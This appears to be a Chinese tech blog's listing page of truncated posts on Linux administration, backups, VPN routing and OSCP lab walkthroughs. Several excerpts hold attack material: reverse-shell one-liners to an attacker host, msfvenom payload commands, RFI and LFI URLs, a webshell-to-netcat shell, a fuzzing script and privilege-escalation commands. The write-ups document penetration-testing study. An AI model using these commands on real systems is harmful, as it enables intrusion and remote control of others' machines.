Centos7更换下载源
Centos5wget -O /etc/yum.repos.d/CentOS-Base.repo http://mirrors.cloud.tencent.com/repo/centos5_base.repo
Centos6wget -O /etc/yum.repos.d/CentOS-Base.repo http://mirrors.cloud.tencent.com/repo/centos6_base.repo
Centos7wget -O /etc/yum.repos.d/CentOS-Base.repo http://mirrors.cloud.tencent.com/repo/centos7_base.repo
Centos8wget -O /etc/yum.repos.d/CentOS-Base.repo http://mirrors.cloud.tencent.com/repo/centos8_base.repo
添加epel 源yum -y install epel-releaserpm -ivh http://rpms.famillecollet.com/enter ...
自动备份文件和数据库的Script
https://github.com/jinzizhe/Server-File-Auto-Backup
#!/bin/bash
echo “+————————————————————————+”echo “| Server Data Auto Backup Script |”echo “+————————————————————————+”echo “| A tool to auto-compress & auto-upload data to FTP server |”echo “+————————————————————————+”echo “| https://github.com/jinzizhe/Server-File-Auto-Backup/ |”echo “+————————————————————————+”
if [ -e “/backup/config” ];then
day=$(cat /backup/config | grep “day” | cut -d “:” -f 2)FTPI ...
Kali校验数字签名失败
wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add
PWK-LAB 10.11.1.39 LEFT TURN攻略
nmao扫描一下,发现只开放了3个端口。
查看下网页内容。nikto扫描一哈
http://10.11.1.39/otrs/index.pl
账户名可通过查阅manuel得知为root@localhost http://doc.otrs.com/doc/manual/admin/4.0/en/html/first-login.html
密码猜出为otrs
登陆到后台
https://packetstormsecurity.com/files/146038/OTRS-5.0.x-6.0.x-Remote-Command-Execution.html
发现otrs5存在一个RCE漏洞。
http://10.11.1.39/otrs/index.pl?Action=AdminSysConfig;Subaction=Edit;SysConfigSubGroup=Crypt::PGP;SysConfigGroup=Framework;#
改成我们想要执行的恶意代码的内容。
nc -lvp 443
访问http://10.11.1.39/otrs/index.pl?Action=Admin ...
PWK-LAB 10.11.1.35 PAIN攻略
PAIN这台机子是真的挺痛苦的
先感谢OS-19168为我提供了宝贵的信息。
参考链接:https://labs.neohapsis.com/2008/07/21/local-file-inclusion-%E2%80%93-tricks-of-the-trade/
首先NMAP扫一下,发现这台机子只开了443和22端口。
https://10.11.1.35访问一下,发现存在一个未搭建完毕的web站点。
观察源码,东看西看一下
发现了几个很敏感的链接 https://10.11.1.35/section.php?page=alldocs
一眼看上去就有LFI漏洞,因为alldocs不存在.php所以需要%00来截断一下
https://10.11.1.35/section.php?page=../../../../../../../etc/passwd%00
果不其然哈。
后来按照常规思路,是要向apache日志文件里写恶意代码,但是过程中有很多问题。
第一点,无论是nc还是telnet,向443端口倒恶意代码的时候,服务器端都没返回信息,实际上是因为ssl的原因没有导入成功 ...
PWK-LAB 10.11.1.31 RALPH攻略
参考链接:http://www.madirish.net/59
NMAP扫描结果
有80先看下http啥内容
源码以及弱密码都没有成效。nikto扫描也没有啥结果。
尝试基于smb协议的各种漏洞,都不成功。
nmap的NSE脚本 nbtscan nmblookup enum4linux smbclient 扫一下目标机器的smb协议。
nmblookup -A 10.11.1.31
enum4linux 10.11.1.31
nmap 10.11.1.31 -p 139,445 –script=smb-enum-shares
可以看到有一个wwwroot的贡献,当前匿名用户是可读权限!
smbclient -L \\RALPH -I 10.11.1.31 -N
知道了有一个叫wwwroot的共享之后,敏感名字马上看一下
smbclient //RALPH/wwwroot -I 10.11.1.31 -N
发现存在base-login.asp和login-off.asp的txt完整源码版本。
浏览器看一下。发现login-off.a ...
记一次灾难性的mysql数据恢复
2018年5月21日,吃饱了没事干,想搞邮件服务器,百度找到个叫U-mail的东西。
进了官网,感觉挺好,脑子抽了,直接生产环境上装了,发现很垃圾,卸载。
rpm一看,包很多,写了个脚本一键删了。
删完重启,心想生产环境不会被他弄坏吧。一看wp,完蛋了,打不开了。
看了下本地服务器上的数据库备份。发现最新的备份是3月8号的。
我4,5月份写了那么多笔记啊!!!!!!!
开始想办法恢复数据。
systemstl status mysql
发现mysql这个服务都不存在了,完蛋。
cd /usr/local/mysql
看一下物理目录还在吗,能进去,还在。
数据库的数据文件一般保存在/usr/local/mysql/var/数据库名字 内,进去看了一下,文件都在。
.idb格式的是数据内容 .frm格式的是数据结构
现在要做的就是把这些东西恢复成数据库的数据。
换了台机子,重新装了mysql同版本,进了/usr/local/mysql/var 把原机子上的数据库源 ...
PWK-LAB 10.11.1.10 Mike攻略
nmap扫描结果
只对外开放了80端口
Nikto -h 10.11.1.10扫描一下
发现存在Adobe coldfusion8
coldfusion 存在lfi漏洞,可以直接读取到管理员密码。
admin:pass123
发现可以通过计划任务的方式,上传特定的文件到web目录内。似乎只可以上传cfm格式的
谷歌发现存在相应的cfm木马 cfexec-with-upload
下载之后通过计划任务上传到web目录
记得一定勾选上Save output to a file!!!.
输入cfm木马地址,并访问
上传nc
注意cfexec.cfm这个木马是规定了上传的文件都是上传到C:\目录下的!浪费了好多时间就是因为没有仔细看cfm源码!
上传完成之后
先在攻击机上开一个监听端口,再在
Command输入 C:\nc.exe
Option输入 -vn 10.11.0.198 4444 -e cmd.exe
反弹自己的cmd shell给攻击机
成功GET SHELL!
proof.txt a416a831fddf36aa8c01ba0674ca7bf8
彩蛋:
I did t ...
提权后处理后渗透操作
Windows
net user /add //添加用户
net localgroup administrators /add //将用户加入administrators权限组
net user guest /active:yes //激活guest账户
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f //开启远程桌面连接服务,会丢失连接
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 ...
SSH反向代理内网穿透
Openssh Windows穿透内网外网服务器端vim /etc/ssh/sshd_config
找到GatewayPorts把前面的#去掉 后面改成yes
systemctl restart sshd.service
配置好防火墙 开放vps的特定端口
内网服务器端安装openssh
ssh -C -g 外网服务器用户名@外网服务器ip -R 内网服务器端口:0.0.0.0:外网服务器端口 free -m -s30
SSH Linux穿透内网外网服务器端vim /etc/ssh/sshd_config
找到GatewayPorts把前面的#去掉 后面改成yes
systemctl restart sshd.service
配置好防火墙 开放vps的特定端口
内网服务器端安装sshpass可以避免二次交互输入密码
yum -y install sshpass
sshpass -p “pass” ssh -fCNR 内网服务器端口:0.0.0.0:外网服务器端口 外网服务器用户名@外网服务器ip
KeepAli ...
反弹shell与生成shell
反弹shell0x01 bash 版本:bash -i >& /dev/tcp/attackerip/1234 0>&1
注意这个是由解析 shell 的 bash 完成,所以某些情况下不支持。我用 zsh 不能反弹。这个也是最常用的。
0x02 nc 版本:支持 - e 选项
nc -e /bin/sh attackerip 1234
这个方式最简单 不能使用 - e 选项时:
mknod backpipe p && nc attackerip 8080 0<backpipe | /bin/bash 1>backpipe/bin/sh | nc attackerip 4444rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/
安装的 NC 版本有问题时:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip 1234 >/tmp/f
0x03 Te ...
PWK-LAB 10.11.1.8 凤凰攻略
这台机子使用了一个Advance Comment System的webapp
Advance Comment System有RFI漏洞
具体链接
http://10.11.1.8/internal/advanced\_comment\_system/index.php?ACS\_path=http://10.11.0.222/evil.txt?
可以让机器执行http://10.11.0.222/evil.txt的php代码中的指令
在攻击机器上nc -lvp 443就可以获得的权限的shell
但是此时获得的shell不是TTY的shell,所以需要转成TTY的shell
发现目标机器上安装了python,于是
python -c ‘import pty; pty.spawn(“/bin/sh”)’
将其转换为TTY
使用linuxprivchecker扫描该机器,勋在可以提权的点
linuxprivchecker
经过linuxprivchecker检查发现目标系统为Centos4.8
非常老的版本了,很可能存在提权漏洞
搜索发现存在Linux Kern ...
OSCP线索及成果
10.11.1.5存在漏洞 MS03-026 MS03-026
proof.txt ed20b785808f615be2c588ed925b18ce
登录帐号 alice密码aliceishere
额外发现 bank-account.zip 解压密码alice
内含文件:bank-account
10.11.1.7需要后期发现帐号及密码
10.11.1.8https://wp.jinzz.cc/?p=530
10.11.1.10https://wp.jinzz.cc/?p=579
10.11.1.13/10.11.1.14存在漏洞: FTP未合理设置上传权限,可以上传木马至网页根目录
利用msfvenom生成asp木马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.222 LPORT=4444 -f asp > 1.asp
使用windwos机子将木马文件上传至目标机器.访问10.11.1.13/1.asp同时Kali在后台生成监听端口
即 ...
RouterOS使用vpn国内外流量分流
所需文件WinBox:winbox
rsc脚本:2017-12-31ChinaIP 2018-9-22ChinaIP
打开winbox连接上路由器
第一步:先检查nat以及防火墙过滤规则是否配置正确,能否正常上网
第二步:导入rsc文件至RB中
第三步:打开RB的Terminal执行rsc脚本文件
import file=2017-12-31ChinaIP.rsc
第四步:进入Firewall设置流量标记规则
首先设置Chian为prerouting
在将Dst.Address List设置为! novpn
再将Dst.Address Type 的Adress Type设置为local并且勾选invert
再将Action改为mark routing 并新建New mark routing 为vpn
防火墙标记相关的步骤完成
第五步:添加vpn连接以及默认路由
添加需要的vpn连接
新建一条路由规则并按如下图配置
第六步:配置DNS服务器为个人搭建的125.71.5.35
至此完成所有步骤
连接该路由器的用户可以获得最佳的网络体验
自建防DNS污染服务器(Windows)
Github项目地址:https://github.com/chengr28/Pcap\_DNSProxy
前置需求软件WinPcap:https://www.winpcap.org/install/default.htm
下载解压到任意盘符
以管理员身份运行
安装后修改网卡DNS首选服务器为127.0.0.1
修改Config.ini文件
Operation Mode = Server
Outgoing Protocol = IPv4 + TCP
Local Protocol = IPv4 + TCP
msfvenom
List payloadsmsfvenom -l
BinariesLinux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
Web PayloadsPHP
msfvenom -p php/meterpreter ...
Windows缓冲区溢出理解及实验
以SLmail为例 (一个邮件服务器软件)
工具 Immunity Debugger
先将Debugger Attach上SLmail的主进程
在点那个
让进程解除冰冻状态,转为running
这个时候转到Kali,使用Buffer溢出脚本检测溢出所需的字节,脚本源码如下
#!/usr/bin/python#!/usr/bin/pythonimport sysimport sockettarget=sys.argv[1]buffer=[“A”]counter=100while len(buffer) <= 30: buffer.append(“A”*counter) counter=counter+200for string in buffer: print “Fuzzing PASS with %s byte” % len(string) s=socket.socket(socket.AF_INET, socket.SOCK_ST ...
OSCP临时笔记
Kali自带的http服务是apache2,网站根目录在
/var/www
Kali将某些程序加入开机启动项
update-rc.d ssh enable
systemctl enable ssh //加入启动项
systemctl ssh start //启动
图形化启动项管理软件rcconf
cat index.html |grep “href=”|cut -d”/“ -f 3|grep “cisco.com”|cut -d’”‘ -f 1|sort -u >cisco.txt
index.html为思科官网的主页文件,目标是提取网页中所有和思科相关的网址
第一个过滤规则 |grep “href=” 的意思是保留所有有href=这一字符串的行
第二个过滤规则的 -d”/“ 是以 / 为分界将每行文本划为不同的块 -d 理解为divide
-f 的意思是选中第三块的内容作为需要的内容
第三个过滤规则意思是保留有cisco.com的行
第四个过滤规则是 ...
centos7系统备份与还原
1. 前言在使用Ubuntu之前,相信很多人都有过使用Windows系统的经历。如果你备份过Windows系统,那么你一定记忆犹新:首先需要找到一个备份工具(通常都是私有软件),然后重启电脑进入备份工具提供的软件环境,在这里备份或者恢复Windows系统。Norton Ghost是备份Windows系统时经常使用的备份工具。
在备份Windows系统的时候你可能想过,我能不能把整个C盘都放到一个ZIP文件里去呢。这在Windows下是不可能的,因为在Windows中有很多文件在它们运行时是不允许拷贝或覆盖的,因此你需要专门的备份工具对Windows系统进行特殊处理。
和备份Windows系统不同,如果你要备份Ubuntu系统(或者其它任何Linux系统),你不再需要像Ghost这类备份工具。事实上,Ghost这类备份工具对于Linux文件系统的支持很糟糕,例如一些Ghost版本只能完善地支持Ext2文件系统,如果你用它来备份Ext3文件系统,你可能会丢失一些宝贵的数据。
2. 本文分析内容安排
备份系统
恢复系统
3. 备份系统我该如何备份我的Ubuntu系统呢?很简单,就像你备份或 ...
基本Linux提权操作
常用ScriptLinEnum.sh
https://github.com/rebootuser/LinEnum
linPeas
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
winPeas
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
Operating SystemWhat’s the distribution type? What version?
cat /etc/issuecat /etc/*-releasecat /etc/lsb-release # Debian basedcat /etc/redhat-release # Redhat based
What’s the kernel version? Is i ...